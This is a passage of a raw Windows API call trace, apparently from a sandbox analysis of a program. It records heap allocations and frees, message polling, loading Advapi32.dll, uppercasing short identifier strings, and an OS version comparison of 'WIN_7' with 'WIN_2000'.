[0188.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0188.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0188.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0188.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0188.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0188.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0188.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0188.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0188.829] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0188.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0188.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0188.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0188.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0188.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0188.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0188.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0188.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0188.830] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0188.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0188.830] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0188.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0188.830] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0188.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0188.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0188.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0188.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1198 [0188.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0188.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0188.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0188.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b40 [0188.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0188.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0188.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0188.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0188.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0188.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0188.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0188.831] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0188.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0188.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0188.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0188.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0188.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0188.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0188.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0188.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0188.832] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0188.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0188.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0188.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0188.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0188.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0188.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0188.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0188.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0188.832] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0188.832] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0188.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0188.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0188.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0188.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0188.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0188.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0188.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0188.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0188.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0188.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0188.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0188.833] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0188.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0188.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0188.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0188.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0188.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0188.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0188.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0188.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0188.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.833] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0188.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0188.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0188.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0188.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0188.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0188.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0188.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0188.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0188.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0188.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0188.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0188.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0188.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.834] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0188.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0188.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0188.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0188.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0188.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0188.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0188.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0188.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0188.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0188.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0188.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0188.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0188.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0188.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0188.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0188.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0188.835] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0188.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0188.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0188.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0188.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0188.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416270 [0188.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0188.836] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0188.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0188.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0188.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa550 [0188.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0188.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0188.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8c0 [0188.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0188.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0188.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0188.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0188.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0188.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0188.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0188.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0188.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0188.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0188.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0188.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0188.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0188.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0188.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0188.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0188.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0188.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0188.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0188.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0188.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0188.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0188.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0188.837] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0188.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0188.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0188.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0188.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0188.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0188.838] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0188.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0188.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0188.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa950 [0188.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0188.838] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0188.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0188.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0188.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0188.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0188.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0188.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0188.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0188.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0188.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0188.838] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0188.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0188.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0188.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0188.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0188.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0188.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0188.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0188.839] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0188.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0188.839] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0188.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0188.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0188.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0188.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0188.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0188.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0188.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0188.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0188.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0188.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0188.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0188.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0188.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0188.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0188.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0188.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0188.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0188.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0188.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0188.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0188.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0188.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0188.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0188.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0188.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0188.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: 